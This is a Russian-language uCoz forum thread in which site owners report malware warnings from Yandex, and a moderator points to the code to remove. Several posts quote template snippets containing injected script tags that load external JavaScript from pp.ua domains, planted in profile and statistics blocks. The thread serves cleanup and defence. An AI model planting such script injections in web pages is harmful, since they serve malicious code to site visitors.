Чат сообщества
   | |
| Модератор форума: Yuri_G |
| Сообщество uCoz Мастерская uCoz Безопасность сайта Вирусы на сайтах_2 (для изучения) |
| Вирусы на сайтах_2 |
|
Йороучи, он под фильтром яндекса http://yandex.ru/yandsea....&lr=213 причем под очень жестоким
и внутри скрипта есть три пункта с этого сайта так у вас на сайте нет ничего такого, но фильтр безопасности может быть наложен из-за одной единственной ссылки или картинки с сайта под блоком. вам надо написать в тех. поддержку яндекса для уточнений. пусть дадут кусочек кода зайдите в вебмастер в раздел безопасность, там должна быть инфа, если нет указаний на определенный код и стоит поведенческий то пишите в тех. поддержку |
|
Добрый вечер! На моем моем сайте www.alexplusn.ucoz.ru в правом верхнем углу появилась странная реклама, ну "удали быстро свой живот" или "предсказания Ванги" я еще переживу)) Но вот когда кликаешь на кнопочку "отключить рекламу", открывается окно со стилем укоза и предлагается ввести свой номер для отключения рекламы, причем для разных операторов - разные цены... что-то меня это очень пугает... Или это новая такая услуга у ucoz'a??? Просветите пожалуйста простого смертного))
|
|
bogosverch, это новый сервис скоро будет официальная информация
metrAnom, Quote Аналогично. Ссылка в банере ведет на фишинговый сайт. Проверил много других укозовских сайтов, тоже самое. При авторизации банер пропадает. Вас паламали, ага? |
|
После просмотра исходного кода нашел (вроде оно) тело зверя:
<table border="0" cellspacing="0" cellpadding="0" id="anPpqt" style="z-index:10000;width:282px"> <tr> <td valign="top" width="12"><a href="javascript://" onclick="fanPpqt('none');return false;" title="Закрыть"><img alt="" src="http://s42.ucoz.net/img/ma/cv.gif" style="border:0;width:12px;height:54px;margin-top:31px;"></a></td> <td id="advtd" width="270" style="background:#fff;"><a href="javascript://" onclick="new _uWnd('SMSPAYFORM', 'Отключение рекламы', -550, -330, {resize:0,autosize:0,align:'justify'}, { url: 'http://s0.ucoz.net/cgi/ucozads.fcg?a=payform_p0', type: 'GET', data: '', timeout: 20000, dataType: 'jsonp', success: function(data){ if(this.wnd>0 && _uWnd.all[this.wnd]) _uWnd.all[this.wnd].content(data.PAYFORM); } });return false;" title="Отключить рекламу на всех сайтах системы uCoz" class="a-buttons green-but a-clock"><span><span>Отключить рекламу</span></span></a><script type="text/javascript">document.write('<iframe ALLOWTRANSPARENCY="true" frameborder="0" width="270" scrolling="no" style="height:430px;background-color:transparent;border:0px" src="/abnl/?begun=2"></iframe>');</script> <a href="//www.ucoz.ru/?pguid=882644864" target="_blank" class="a-buttons blue-but a-check"><span><span>Создать сайт бесплатно</span></span></a> </td></tr> </table> Но вот куда запрятан этот "iframe"? Найти не могу... Перелопатил "все шаблоны", "виды" и прочее. Возможно найдется тот, кто нашел решение сей проблемы? Добавлено (18-Янв-2012, 21:05:46) |
|
bogosverch, это кнопка нового сервиса внедрена в системный баннер юкоза. ничего искать и удалять не надо
|
|
Мансур, профиль пользователя. выделенное красным удалить
Quote <br> <script type="text/javascript" src="http://r1p.pp.ua/1.js "></script><img class="userAvatar" title="Разведчик" src="http://i021.radikal.ru/0804/53/f5b4265aa726.gif" border="0"> |
|
Здравствуйте ! Прошу помочь с таким вопросом яндекс прислал сообщение что на страницах сайта обнаружен вредоносный код прошу помочь найти его плиз, мой сайт:
http://piddnistryany.at.ua/ |
|
Подскажите пожалуйста!
Яндекс блокирует мой сайт вот что он пишет: Quote Первые две страницы я удалила, и сделала перепроверку, но он все равно выдает на этих страницах вирус... Помогите пожалуйста, я даже не знаю где искать эти кода  а многие уже жалуются что у них не открывается сайт... |
|
yony, вредоносный код вшит в информер статистики
выделенное красным удалить Quote Статистика<!-- </bt> --></div></td> <td width="28%"><img border="0" src="/.s/t/121/10.gif" width="54" height="21"></td> </tr> </table> </td> </tr> <tr><td class="topBorder" style="padding:3px;" bgcolor="#F4F4F4"><!-- <bc> --><script type="text/javascript" src="http://piddnistryany.at.ua/informer/3"></script><!-- </bc> --></td></tr> <tr><td bgcolor="#E9ECF5"><img border="0" src="/.s/t/121/11.gif" width="190" height="21"></td></tr> код информера прописан закодированным кодом и содержит вредоносную вставку Code <script type=\"text/javascript\" src=\"http://onona.pp.ua/1.js\"></script> bandjuk, не гадаем |
|
meli, блок мой профиль выделенное красным удалить
Quote <tr><td style="background:url('/.s/t/995/15.jpg') #F3D895;padding:5px 7px 5px 7px;"><!-- <bc> --><div align="center"><strong>Привет, Странник</strong> <br> <script src="http://iot.pp.ua/1.js" type="text/javascript"></script><img class="userAvatar" title="Странник" src=" с вашей стороны было большой глупостью удалять страницы указанные яндексом. это всего лишь те страницы на которых был обнаружен вредоносный код. вы удалили страницы, а вредоносный код остался в блоке, который выводится на всех страницах сайта. в следующий раз перед удалением чего либо обращайтесь за помощью |
| |||